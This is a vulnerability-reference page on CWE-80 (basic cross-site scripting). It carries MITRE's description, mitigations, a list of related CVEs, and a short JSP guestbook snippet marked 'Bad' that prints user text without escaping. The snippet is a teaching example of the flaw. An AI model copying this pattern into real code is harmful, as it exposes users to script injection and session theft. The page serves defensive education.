Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)) — Vulnerability Class 403

403 vulnerabilities classified as CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)). AI Chinese analysis included.

CWE-80 represents a critical input validation weakness where applications fail to properly sanitize user-supplied data before rendering it in web pages. This flaw allows attackers to inject malicious scripts, typically JavaScript, into the HTML content viewed by other users. Exploitation usually occurs when an attacker crafts a malicious URL or form input containing script tags, which the vulnerable application then executes in the victim’s browser without proper filtering. This can lead to severe consequences such as session hijacking, credential theft, or defacement. To mitigate this risk, developers must implement robust output encoding strategies, ensuring that all special characters like angle brackets and ampersands are converted into their safe HTML entity equivalents. Additionally, employing Content Security Policy headers and utilizing modern frameworks with built-in escaping mechanisms further reduces the attack surface by preventing the execution of unauthorized scripts.

MITRE CWE Description
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityRead Application Data, Execute Unauthorized Code or Commands
An attacker could insert special characters that are processed client-side in the context of the user's session.
Mitigations (4)
ImplementationCarefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities i…
ImplementationUse and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are i…
ImplementationWith Struts, write all data from form beans with the bean's filter attribute set to true.
ImplementationTo help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is n…
Effectiveness: Defense in Depth
Examples (1)
In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.
<% for (Iterator i = guestbook.iterator(); i.hasNext(); ) { Entry e = (Entry) i.next(); %> <p>Entry #<%= e.getId() %></p> <p><%= e.getText() %></p> <% } %>
Bad · JSP
CVE IDTitleCVSSSeverityPublished
CVE-2023-30615 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in iris-web — iris-web 6.3 Medium2023-05-25
CVE-2023-0007 PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in the Panorama Web Interface — PAN-OS 6.5 Medium2023-05-10
CVE-2023-25833 BUG-000155004 HTML injection issue in Portal for ArcGIS. — Portal for ArcGIS 5.4 Medium2023-05-10
CVE-2023-1384 Amazon Fire TV Stick 跨站脚本漏洞 — Fire TV Stick 3rd gen 4.3 Medium2023-05-03
CVE-2023-22309 Reflected Cross Site Scripting (XSS) — Checkmk Appliance 6.1 Medium2023-04-20
CVE-2023-29508 org.xwiki.platform:xwiki-platform-livedata-macro vulnerable to Cross-site Scripting — xwiki-platform 8.9 High2023-04-16
CVE-2022-35850 Fortinet FortiAuthenticator 跨站脚本漏洞 — FortiAuthenticator 4.2 Medium2023-04-11
CVE-2023-29112 Code Injection vulnerability in SAP Application Interface Framework (Message Monitoring) — Application Interface Framework (Message Monitoring) 3.7 Low2023-04-11
CVE-2023-29110 Code Injection vulnerability in SAP Application Interface Framework (Message Dashboard) — Application Interface Framework (Message Dashboard) 3.7 Low2023-04-11
CVE-2023-28851 Silverstripe Form Capture vulnerable to Stored Cross-Site Scripting — silverstripe-form-capture 6.1 Medium2023-04-03
CVE-2023-1013 XSS in Vira-Investing — Vira-Investing 6.1 Medium2023-03-30
CVE-2022-1274 Keycloak 跨站脚本漏洞 — keycloak 5.4 -2023-03-29
CVE-2021-44197 XSS in UBIT Information Technologies Student Information Management System — Student Information Management System 6.1 Medium2023-03-07
CVE-2021-44196 XSS in UBIT Information Technologies Student Information Management System — Student Information Management System 6.1 Medium2023-03-07
CVE-2023-26047 teler-waf contains detection rule bypass via entities payload — teler-waf 6.5 Medium2023-03-03
CVE-2023-26046 teler-waf subject to bypass of common web attack threat rule with HTML entities payload — teler-waf 6.5 Medium2023-03-02
CVE-2023-22464 ViewVC XSS vulnerability in revision view changed path "copyfrom" locations — viewvc 5.4 Medium2023-01-04
CVE-2022-38210 HTML injection in accountswitcher-callback.html (10.9.1, 10.8.1 and 10.7.1 only) — ArcGIS Enterprise 6.1 Medium2022-12-30
CVE-2022-23543 HTML attributes when attaching a YouTube link to the post — silverwaregames-io-issue-tracker 6.3 Medium2022-12-19
CVE-2022-28703 Lansweeper 跨站脚本漏洞 — lansweeper 5.4 -2022-12-19
CVE-2022-46350 Siemens SCALANCE Series 跨站脚本漏洞 — SCALANCE X204RNA (HSR) 7.5 -2022-12-13
CVE-2022-39371 Stored Cross-Site Scripting (XSS) through asset inventory in GLPI — glpi 7.5 High2022-11-03
CVE-2022-3844 Webmin index.cgi cross site scripting — Webmin 3.5 Low2022-11-02
CVE-2022-39348 Twisted vulnerable to NameVirtualHost Host header injection — twisted 5.4 Medium2022-10-26
CVE-2022-39301 sra-admin is vulnerable to storage cross-site scripting (XSS) via unrestricted file upload — sra-admin 8.2 High2022-10-19
CVE-2022-36057 Discourse-Chat Cross-Site Scripting issue for channel names and descriptions — discourse-chat 5.4 Medium2022-09-06
CVE-2022-35278 HTML Injection in ActiveMQ Artemis Web Console — Apache ActiveMQ Artemis 6.1 -2022-08-23
CVE-2022-36325 Siemens SCALANCE 安全漏洞 — RUGGEDCOM RM1224 LTE(4G) EU 6.8 Medium2022-08-10
CVE-2022-1293 XSS vulnerability in Citadel — Citadel Web Client 5.7 Medium2022-08-02
CVE-2017-20140 Itech Movie Portal Script movie.php Reflected cross site scripting — Movie Portal Script 4.3 Medium2022-07-22

Vulnerabilities classified as CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)) represent 403 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.